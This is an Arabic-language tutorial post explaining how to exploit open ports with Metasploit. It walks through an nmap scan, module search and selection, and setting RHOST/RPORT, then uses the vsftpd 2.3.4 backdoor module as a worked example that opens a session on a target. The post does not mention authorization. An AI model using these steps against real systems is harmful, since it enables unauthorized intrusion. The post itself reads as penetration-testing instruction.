🛡️ كيفية استغلال البورتات المفتوحة باستخدام Metasploit 🧑🏻‍💻..

🛡️ كيفية استغلال البورتات المفتوحة باستخدام Metasploit 🧑🏻‍💻..

يتطلب معرفة بأساسيات الأمان السيبراني، بالإضافة إلى معرفة كيفية استخدام الأدوات بشكل فعال. سأقوم بشرح الخطوات الأساسية لذلك مع مثال عملي.

### الخطوات الأساسية لاستغلال البورتات المفتوحة باستخدام Metasploit:

1. جمع المعلومات:
   – قبل أي شيء، يجب عليك جمع المعلومات عن الهدف. يمكنك استخدام أدوات مثل

nmap

لفحص الشبكة والعثور على البورتات المفتوحة.
   – مثال:
   

     nmap -sS -p- <target_ip>
    

2. فتح Metasploit:
   – بعد جمع المعلومات، افتح Metasploit باستخدام الأمر:
   

     msfconsole
    

3. البحث عن الاستغلال المناسب:
   – ابحث عن الاستغلال المناسب للبورت المفتوح الذي تم اكتشافه. يمكنك استخدام الأمر:
   

     search <service_name>
    

   – على سبيل المثال، إذا كان هناك بورت مفتوح لخدمة

FTP

، يمكنك البحث عن استغلالات تتعلق بـ

FTP

.

4. اختيار الاستغلال:
   – بعد العثور على الاستغلال المناسب، قم بتحميله باستخدام الأمر:
   

     use <exploit_path>
    

5. تكوين الخيارات:
   – بعد تحميل الاستغلال، يجب عليك تكوين الخيارات اللازمة مثل عنوان IP الهدف والبورت المفتوح. يمكنك استخدام الأمر:
   

     show options
    

   – ثم قم بتحديد الخيارات المطلوبة باستخدام الأمر:
   

     set RHOST <target_ip>
     set RPORT <target_port>
    

6. تشغيل الاستغلال:
   – بعد تكوين الخيارات، يمكنك تشغيل الاستغلال باستخدام الأمر:
   

     exploit
    

### مثال عملي:

لنفترض أن لدينا خادم FTP يعمل على البورت 21، ونريد استخدام Metasploit لاستغلال ثغرة معروفة.

1. جمع المعلومات باستخدام nmap:
 

   nmap -sS -p 21 <target_ip>
  

2. فتح Metasploit:
 

   msfconsole
  

3. البحث عن استغلالات FTP:
 

   search ftp
  

4. اختيار استغلال:
   لنفترض أننا وجدنا استغلالاً يسمى

exploit/unix/ftp/vsftpd_234_backdoor

(ثغرة معروفة في vsftpd).
 

   use exploit/unix/ftp/vsftpd_234_backdoor
  

5. تكوين الخيارات:
 

   set RHOST <target_ip>
   set RPORT 21
  

6. تشغيل الاستغلال:
 

   exploit
  

بعد تشغيل الاستغلال، إذا كانت العملية ناجحة، ستحصل على جلسة مع النظام المستهدف.

Scroll to Top